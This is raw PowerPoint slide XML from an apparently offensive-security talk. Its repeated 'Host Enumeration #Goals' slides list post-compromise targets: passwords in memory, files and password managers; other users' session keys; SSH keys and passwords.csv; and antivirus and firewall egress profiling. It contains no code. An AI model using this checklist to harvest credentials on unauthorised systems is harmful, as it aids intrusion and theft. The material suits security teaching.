      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A9FA134-9DF0-4166-8EA7-A0DB8C5F2993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33071718-5295-47ED-A417-ECB951256B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="5764690"/>
            <a:ext cx="4174446" cy="858982"/>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5093349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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1FAE03-D42D-49DE-86E7-7D72B6FB0CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1D7F8E-9652-4869-8309-1A1535253398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1644482"/>
            <a:ext cx="3889501" cy="1784518"/>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40548470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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785FFC86-27BF-433A-A2EC-E205665D0FBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598445" y="1521958"/>
            <a:ext cx="4376813" cy="4387556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In-memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password managers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
